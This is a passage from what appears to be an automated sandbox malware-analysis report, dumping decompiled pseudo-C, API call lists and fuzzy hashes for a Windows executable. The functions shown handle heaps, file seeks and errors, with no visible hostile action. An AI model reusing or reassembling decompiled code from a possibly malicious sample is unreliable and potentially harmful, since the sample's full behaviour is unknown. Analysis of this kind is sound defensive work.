                                          																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
                                          																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
                                          																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
                                          																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
                                          																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
                                          																			continue;
                                          																		} else {
                                          																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
                                          																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
                                          																			goto L23;
                                          																		}
                                          																	}
                                          																}
                                          																goto L28;
                                          															}
                                          															__eflags = _t104 - _t71;
                                          															goto L19;
                                          														}
                                          													}
                                          												}
                                          											}
                                          											goto L28;
                                          										}
                                          										L27:
                                          										_t115 = _t67;
                                          									}
                                          								}
                                          							}
                                          							L28:
                                          							 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
                                          							E00403A9C( *((intOrPtr*)(_t116 - 0x24)));
                                          							_t57 = _t115;
                                          							goto L29;
                                          						}
                                          					} else {
                                          						_t57 = 0;
                                          					}
                                          				}
                                          				L29:
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
                                          				return _t57;
                                          			}
                                          0x0040dedf
                                          0x0040dee7
                                          0x0040deea
                                          0x0040deef
                                          0x0040def2
                                          0x0040def3
                                          0x0040def5
                                          0x0040def5
                                          0x0040def8
                                          0x0040deff
                                          0x0040df04
                                          0x00000000
                                          0x0040de99
                                          0x0040de99
                                          0x0040de9f
                                          0x0040dea2
                                          0x0040de71
                                          0x0040de74
                                          0x0040de77
                                          0x00000000
                                          0x0040dea4
                                          0x0040dea4
                                          0x0040dea7
                                          0x00000000
                                          0x0040dea7
                                          0x0040dea2
                                          0x0040de97
                                          0x00000000
                                          0x0040de8c
                                          0x0040de8a
                                          0x00000000
                                          0x0040de8a
                                          0x0040de77
                                          0x0040de6d
                                          0x0040de5b
                                          0x00000000
                                          0x0040de55
                                          0x0040df07
                                          0x0040df07
                                          0x0040df07
                                          0x0040de1f
                                          0x0040de1b
                                          0x0040df09
                                          0x0040df0c
                                          0x0040df13
                                          0x0040df19
                                          0x00000000
                                          0x0040df19
                                          0x0040ddc1
                                          0x0040ddc1
                                          0x0040ddc1
                                          0x0040ddbf
                                          0x0040df1b
                                          0x0040df21
                                          0x0040df29

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-3916222277
                                          • Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                                          • Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
                                          • Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                                          • Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 95%
                                          			E00403113(intOrPtr* __ecx, void* __eflags) {
                                          				void* _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t68;
                                          				intOrPtr _t73;
                                          				intOrPtr* _t82;
                                          				void* _t85;
                                          				void* _t87;
                                          				void* _t121;
                                          				void* _t124;
                                          				intOrPtr _t126;
                                          				intOrPtr* _t129;
                                          				void* _t131;
                                          
                                          				E00413954(E004192B0, _t131);
                                          				_t129 = __ecx;
                                          				E00402EE1(_t131 - 0x40);
                                          				_push( *((intOrPtr*)(__ecx + 4)));
                                          				 *((intOrPtr*)(_t131 - 4)) = 0;
                                          				_t63 = E00405841(_t131 - 0x68, _t121); // executed
                                          				if(_t63 != 0) {
                                          					_t64 =  *((intOrPtr*)(__ecx + 0x1c));
                                          					__eflags = _t64;
                                          					if(_t64 == 0) {
                                          						 *((intOrPtr*)(_t131 - 0x10)) = 0;
                                          					} else {
                                          						 *((intOrPtr*)(_t131 - 0x10)) = _t64 + 4;
                                          					}
                                          					E004032A8(_t131 - 0x30, 4);
                                          					 *((intOrPtr*)(_t131 - 0x30)) = 0x41b378;
                                          					_t126 = _t129 + 0x28;
                                          					 *((char*)(_t131 - 4)) = 1;
                                          					_t68 = E00408F0A(_t126,  *_t129, _t131 - 0x30, 0, 0, _t129 + 4,  *((intOrPtr*)(_t131 - 0x10))); // executed
                                          					 *((intOrPtr*)(_t129 + 0x60)) = _t68;
                                          					 *((char*)(_t131 - 4)) = 0;
                                          					E004042AD(_t131 - 0x30);
                                          					__eflags =  *((intOrPtr*)(_t129 + 0x60));
                                          					if( *((intOrPtr*)(_t129 + 0x60)) == 0) {
                                          						E00401CE1(_t131 - 0x1c, _t129 + 0x10);
                                          						 *((char*)(_t131 - 4)) = 2;
                                          						E00405D0B(_t131 - 0x1c);
                                          						_t73 = E004049DD( *((intOrPtr*)(_t131 - 0x1c))); // executed
                                          						__eflags = _t73;
                                          						if(__eflags != 0) {
                                          							E00401C80(_t131 - 0x28, L"Default");
                                          							 *((char*)(_t131 - 4)) = 4;
                                          							E00402685( *((intOrPtr*)(_t129 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4)))), _t131 - 0x1c, _t131 - 0x28, _t131 - 0x50, 0);
                                          							 *((char*)(_t131 - 4)) = 2;
                                          							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
                                          							_t82 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4))));
                                          							 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)( *_t82 + 0x1c))(_t82, 0, 0xffffffff, 0,  *((intOrPtr*)(_t129 + 0x20)));
                                          							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
                                          							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                                          							goto L11;
                                          						} else {
                                          							_push(_t131 - 0x1c);
                                          							_t124 = 9;
                                          							_t87 = E00409569(_t131 - 0x28, _t124, __eflags);
                                          							 *((char*)(_t131 - 4)) = 3;
                                          							E00401D7A(_t129 + 0x64, _t87);
                                          							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
                                          							 *((intOrPtr*)(_t129 + 0x60)) = 0x80004005;
                                          							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
                                          							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                                          						}
                                          					} else {
                                          						E00401D1B(_t129 + 0x64,  *0x420320);
                                          						goto L7;
                                          					}
                                          				} else {
                                          					E00401D1B(__ecx + 0x64,  *0x42031c);
                                          					 *((intOrPtr*)(__ecx + 0x60)) = 0x80004005;
                                          					L7:
                                          					_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
                                          					L11:
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t131 - 0xc));
                                          				return _t85;
                                          			}

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00403118
                                            • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                            • Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2
                                            • Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: Default
                                          • API String ID: 3519838083-753088835
                                          • Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                                          • Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
                                          • Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                                          • Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 85%
                                          			E00402F15(intOrPtr __ecx, void* __edx, void* __eflags) {
                                          				intOrPtr _t57;
                                          				void* _t73;
                                          				intOrPtr _t90;
                                          				void* _t109;
                                          				intOrPtr _t115;
                                          				intOrPtr _t116;
                                          				void* _t118;
                                          
                                          				E00413954(E00419269, _t118);
                                          				 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) = 0;
                                          				E00403376(_t118 - 0x94);
                                          				 *(_t118 - 4) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x94)) = __ecx;
                                          				E00401D7A(_t118 - 0x90, __edx);
                                          				E00401D7A(_t118 - 0x84,  *((intOrPtr*)(_t118 + 8)));
                                          				_push(0xf0);
                                          				_t90 = E00403A76();
                                          				 *((intOrPtr*)(_t118 + 8)) = _t90;
                                          				 *(_t118 - 4) = 1;
                                          				if(_t90 == 0) {
                                          					_t57 = 0;
                                          					__eflags = 0;
                                          				} else {
                                          					_t57 = E004034E3(_t90);
                                          				}
                                          				 *(_t118 - 4) = 0;
                                          				 *((intOrPtr*)(_t118 - 0x78)) = _t57;
                                          				E0040640D(_t118 - 0x74, _t57);
                                          				if( *((intOrPtr*)(_t118 + 0xc)) == 0) {
                                          					E00403113(_t118 - 0x94, __eflags);
                                          					goto L8;
                                          				} else {
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xd8)) = 1;
                                          					 *((intOrPtr*)(_t118 + 0xc)) = 0;
                                          					 *(_t118 - 4) = 2;
                                          					_t116 = E00413220(_t118 + 0xc, E004032E1, _t118 - 0x94);
                                          					if(_t116 == 0) {
                                          						 *((intOrPtr*)(_t118 - 0x18)) = 0;
                                          						 *((intOrPtr*)(_t118 - 0x14)) = 0;
                                          						 *((intOrPtr*)(_t118 - 0x10)) = 0;
                                          						E00402170(_t118 - 0x18, 3);
                                          						_t109 = 0x45;
                                          						 *(_t118 - 4) = 3;
                                          						_t73 = E0040602F(_t109);
                                          						 *(_t118 - 4) = 4;
                                          						E00401D7A(_t118 - 0x18, _t73);
                                          						 *(_t118 - 4) = 3;
                                          						E00403A9C( *((intOrPtr*)(_t118 - 0x24)));
                                          						_push(_t118 + 0xc);
                                          						_push(_t118 - 0x18);
                                          						E0040309D( *((intOrPtr*)(_t118 - 0x78)));
                                          						E00403A9C( *((intOrPtr*)(_t118 - 0x18)));
                                          						 *(_t118 - 4) = 0;
                                          						E004131E0(_t118 + 0xc);
                                          						L8:
                                          						_t38 = _t118 + 0x14; // 0x414be4
                                          						_t115 =  *_t38;
                                          						E00401D7A(_t115, _t118 - 0x30);
                                          						__eflags =  *((intOrPtr*)(_t115 + 4));
                                          						if(__eflags == 0) {
                                          							__eflags =  *((intOrPtr*)(_t118 - 0x78)) + 0xe4;
                                          							E00401D7A(_t115,  *((intOrPtr*)(_t118 - 0x78)) + 0xe4);
                                          						}
                                          						_t116 =  *((intOrPtr*)(_t118 - 0x34));
                                          						 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xe0));
                                          					} else {
                                          						E004131E0(_t118 + 0xc);
                                          					}
                                          				}
                                          				 *(_t118 - 4) =  *(_t118 - 4) | 0xffffffff;
                                          				E0040348A(_t118 - 0x94,  *(_t118 - 4));
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
                                          				return _t116;
                                          			}

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00402F1A
                                            • Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B
                                            • Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8
                                            • Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
                                            • Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB
                                            • Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
                                            • Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$CloseErrorHandleLastShowWindow
                                          • String ID: KA
                                          • API String ID: 2740091781-4133974868
                                          • Opcode ID: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                                          • Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
                                          • Opcode Fuzzy Hash: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
                                          • Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00408902(intOrPtr* __ecx) {
                                          				long _t33;
                                          				intOrPtr* _t34;
                                          				intOrPtr* _t35;
                                          				intOrPtr* _t39;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t59;
                                          				long _t62;
                                          				intOrPtr* _t64;
                                          				void* _t65;
                                          
                                          				E00413954(E00419B00, _t65);
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t59 = __ecx;
                                          				 *((intOrPtr*)(_t65 - 0x14)) = 0;
                                          				 *(_t65 - 4) = 0;
                                          				 *((intOrPtr*)(_t65 - 0x10)) = 0;
                                          				 *(_t65 - 4) = 1;
                                          				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
                                          					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
                                          						goto L12;
                                          					} else {
                                          						_push(0x10);
                                          						_t39 = E00403A76();
                                          						if(_t39 == 0) {
                                          							_t64 = 0;
                                          						} else {
                                          							 *((intOrPtr*)(_t39 + 4)) = 0x41b5e8;
                                          							 *((intOrPtr*)(_t39 + 8)) = 0;
                                          							 *(_t39 + 0xc) =  *(_t39 + 0xc) | 0xffffffff;
                                          							 *_t39 = 0x41b494;
                                          							 *((intOrPtr*)(_t39 + 4)) = 0x41b484;
                                          							_t64 = _t39;
                                          						}
                                          						E0040640D(_t65 - 0x14, _t64);
                                          						if(E00406434(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
                                          							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
                                          							goto L12;
                                          						} else {
                                          							_t33 = GetLastError();
                                          						}
                                          					}
                                          				} else {
                                          					_push(8);
                                          					_t43 = E00403A76();
                                          					if(_t43 == 0) {
                                          						_t43 = 0;
                                          					} else {
                                          						 *((intOrPtr*)(_t43 + 4)) = 0;
                                          						 *_t43 = 0x41b600;
                                          					}
                                          					E0040640D(_t65 - 0x10, _t43);
                                          					L12:
                                          					_t33 = E00408524(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
                                          				}
                                          				_t62 = _t33;
                                          				_t34 =  *((intOrPtr*)(_t65 - 0x10));
                                          				 *(_t65 - 4) = 0;
                                          				if(_t34 != 0) {
                                          					 *((intOrPtr*)( *_t34 + 8))(_t34);
                                          				}
                                          				_t35 =  *((intOrPtr*)(_t65 - 0x14));
                                          				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
                                          				if(_t35 != 0) {
                                          					 *((intOrPtr*)( *_t35 + 8))(_t35);
                                          				}
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
                                          				return _t62;
                                          			}













                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00408907
                                          • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorH_prologLast
                                          • String ID:
                                          • API String ID: 1057991267-0
                                          • Opcode ID: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                                          • Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
                                          • Opcode Fuzzy Hash: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
                                          • Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E004051C8(void* __ecx, intOrPtr* __edx, void* __eflags) {
                                          				void* _t17;
                                          				void* _t20;
                                          				void* _t21;
                                          				void* _t24;
                                          				long _t27;
                                          				void* _t31;
                                          				void* _t41;
                                          				intOrPtr* _t44;
                                          				void* _t46;
                                          
                                          				_t51 = __eflags;
                                          				_t39 = __edx;
                                          				E00413954(E0041965C, _t46);
                                          				_t41 = __ecx;
                                          				_t44 = __edx;
                                          				E00405268(_t46 - 0x1c);
                                          				while(1) {
                                          					 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                          					_push(_t44);
                                          					_push(_t41);
                                          					_t17 = E0040511B(_t46 - 0x1c, _t39, _t51); // executed
                                          					_t31 = _t46 - 0x1c;
                                          					if(_t17 == 0) {
                                          						break;
                                          					}
                                          					_t21 = E004051A4(_t31);
                                          					_t53 = _t21;
                                          					if(_t21 == 0) {
                                          						_t31 = _t46 - 0x1c;
                                          						break;
                                          					} else {
                                          						 *(_t46 - 4) =  *(_t46 - 4) | 0xffffffff;
                                          						E004051A4(_t46 - 0x1c);
                                          						E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
                                          						_t24 = E004058CD( *_t44, _t39, _t53); // executed
                                          						if(_t24 != 0) {
                                          							L6:
                                          							E00405268(_t46 - 0x1c);
                                          							continue;
                                          						} else {
                                          							if(E0040498D( *_t44) != 0) {
                                          								_t20 = 1;
                                          							} else {
                                          								_t27 = GetLastError();
                                          								_t51 = _t27 - 0xb7;
                                          								if(_t27 != 0xb7) {
                                          									L9:
                                          									_t20 = 0;
                                          									__eflags = 0;
                                          								} else {
                                          									goto L6;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                                          					return _t20;
                                          				}
                                          				E004051A4(_t31);
                                          				E00403A9C( *((intOrPtr*)(_t46 - 0x18)));
                                          				goto L9;
                                          			}













                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004051CD
                                            • Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120
                                            • Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2
                                          • GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog$ErrorLast
                                          • String ID:
                                          • API String ID: 2901101390-0
                                          • Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                                          • Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
                                          • Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
                                          • Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004159F8(void* __ecx, intOrPtr _a4) {
                                          				void* _t6;
                                          				intOrPtr _t8;
                                          				void* _t9;
                                          				void* _t10;
                                          				void* _t12;
                                          
                                          				_t12 = __ecx;
                                          				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                          				_t15 = _t6;
                                          				 *0x425a34 = _t6;
                                          				if(_t6 == 0) {
                                          					L7:
                                          					return 0;
                                          				} else {
                                          					_t8 = E004158B0(_t12, _t15);
                                          					 *0x425a38 = _t8;
                                          					if(_t8 != 3) {
                                          						__eflags = _t8 - 2;
                                          						if(_t8 != 2) {
                                          							goto L8;
                                          						} else {
                                          							_t10 = E0041659C();
                                          							goto L5;
                                          						}
                                          					} else {
                                          						_t10 = E00415A55(0x3f8);
                                          						L5:
                                          						if(_t10 != 0) {
                                          							L8:
                                          							_t9 = 1;
                                          							return _t9;
                                          						} else {
                                          							HeapDestroy( *0x425a34);
                                          							goto L7;
                                          						}
                                          					}
                                          				}
                                          			}









                                          APIs
                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                            • Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF
                                          • HeapDestroy.KERNEL32 ref: 00415A48
                                            • Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Heap$AllocCreateDestroyVersion
                                          • String ID:
                                          • API String ID: 2507506473-0
                                          • Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                                          • Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
                                          • Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
                                          • Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E00405ACE(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
                                          				long _v8;
                                          				long _v12;
                                          				long _t12;
                                          				long _t13;
                                          				long* _t14;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t12 = _a4;
                                          				_v8 = _a8;
                                          				_v12 = _t12;
                                          				_t13 = SetFilePointer( *__ecx, _t12,  &_v8, _a12); // executed
                                          				_v12 = _t13;
                                          				if(_t13 != 0xffffffff || GetLastError() == 0) {
                                          					_t14 = _a16;
                                          					 *_t14 = _v12;
                                          					_t14[1] = _v8;
                                          					return 1;
                                          				} else {
                                          					return 0;
                                          				}
                                          			}









                                          APIs
                                          • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          • Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                                          • Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
                                          • Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
                                          • Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E0040BBC9(signed char __edx) {
                                          				signed int _t287;
                                          				signed char _t289;
                                          				signed int _t291;
                                          				signed char _t292;
                                          				signed char _t295;
                                          				signed char _t305;
                                          				intOrPtr _t307;
                                          				signed char _t308;
                                          				signed char _t314;
                                          				intOrPtr _t315;
                                          				signed char _t323;
                                          				signed char _t325;
                                          				signed char _t329;
                                          				signed char _t330;
                                          				signed char _t334;
                                          				signed char _t335;
                                          				signed char _t340;
                                          				signed char _t345;
                                          				signed char _t349;
                                          				signed char _t351;
                                          				signed char _t352;
                                          				signed char _t356;
                                          				signed char _t368;
                                          				signed char _t372;
                                          				signed int _t380;
                                          				intOrPtr _t388;
                                          				intOrPtr _t397;
                                          				signed char _t401;
                                          				signed char _t407;
                                          				signed char _t408;
                                          				intOrPtr _t410;
                                          				intOrPtr _t475;
                                          				signed char _t485;
